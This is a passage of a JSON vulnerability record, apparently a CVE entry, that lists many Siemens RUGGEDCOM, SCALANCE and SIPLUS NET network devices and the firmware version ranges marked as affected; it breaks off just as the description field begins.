"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2300P V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2300PNC V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2300PNC V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2488 V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2488 V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2488NC V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG2488NC V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG907R",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG908C",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG909R",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG910C",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG920P V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG920P V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG920PNC V4.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V4.3.4",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSG920PNC V5.X",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSL910",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RSL910NC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RST2228",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RST2228P",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RST916C",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "RUGGEDCOM RST916P",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V5.0.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB205-3 (SC, PN)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB205-3 (ST, E/IP)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB205-3 (ST, E/IP)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB205-3 (ST, PN)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB205-3LD (SC, E/IP)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB205-3LD (SC, PN)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB206-2 (SC)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB206-2 (ST/BFOC)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB206-2 LD",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB206-2 SC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB206-2 ST",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB206-2LD",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB208 (E/IP)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB208 (PN)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB213-3 (SC, E/IP)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB213-3 (SC, PN)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB213-3 (ST, E/IP)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB213-3 (ST, PN)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB213-3LD (SC, E/IP)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB213-3LD (SC, PN)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB216 (E/IP)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XB216 (PN)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC206-2 (SC)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC206-2 (ST/BFOC)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC206-2G PoE",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC206-2G PoE (54 V DC)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC206-2G PoE EEC (54 V DC)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC206-2SFP",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC206-2SFP EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC206-2SFP G",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC206-2SFP G (EIP DEF.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC206-2SFP G EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC208",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC208EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC208G",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC208G (EIP def.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC208G EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC208G PoE",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC208G PoE (54 V DC)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC216",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC216-3G PoE",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC216-3G PoE (54 V DC)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC216-4C",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC216-4C G",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC216-4C G (EIP Def.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC216-4C G EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC216EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC224",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC224-4C G",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC224-4C G (EIP Def.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XC224-4C G EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XF204",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XF204 DNA",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XF204-2BA",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XF204-2BA DNA",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XF204G",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XM408-4C",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XM408-4C (L3 int.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XM408-8C",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XM408-8C (L3 int.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XM416-4C",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XM416-4C (L3 int.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP208",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP208",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP208 (Ethernet/IP)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP208EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP208EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP208G",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP208G EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP208G PoE EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP208G PP",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP208PoE EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP208PoE EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP216",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP216 (Ethernet/IP)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP216 (V2)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP216EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP216EEC (V2)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP216G",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP216G EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP216G PoE EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP216POE EEC",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XP216PoE EEC (V2)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR324WG (24 x FE, AC 230V)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR324WG (24 X FE, DC 24V)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR326-2C PoE WG",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR326-2C PoE WG (without UL)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR328-4C WG (24XFE, 4XGE, 24V)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR328-4C WG (24xFE, 4xGE,DC24V)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR328-4C WG (24xFE,4xGE,AC230V)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR328-4C WG (24xFE,4xGE,AC230V)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR328-4C WG (28xGE, AC 230V)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR328-4C WG (28xGE, DC 24V)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR524-8C, 1x230V",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR524-8C, 1x230V (L3 int.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR524-8C, 24V",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR524-8C, 24V (L3 int.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR524-8C, 2x230V",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR524-8C, 2x230V (L3 int.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR526-8C, 1x230V",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR526-8C, 1x230V (L3 int.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR526-8C, 24V",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR526-8C, 24V (L3 int.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR526-8C, 2x230V",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR526-8C, 2x230V (L3 int.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR528-6M",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR528-6M (2HR2, L3 int.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR528-6M (2HR2)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR528-6M (L3 int.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR552-12M",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR552-12M (2HR2, L3 int.)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR552-12M (2HR2)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SCALANCE XR552-12M (2HR2)",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V6.1.1",
"status": "affected",
"version": "V6.1.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SIPLUS NET SCALANCE XC206-2",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SIPLUS NET SCALANCE XC206-2SFP",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SIPLUS NET SCALANCE XC208",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
},
{
"defaultStatus": "unknown",
"product": "SIPLUS NET SCALANCE XC216-4C",
"vendor": "Siemens",
"versions": [
{
"lessThan": "V3.0.2",
"status": "affected",
"version": "V3.0",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
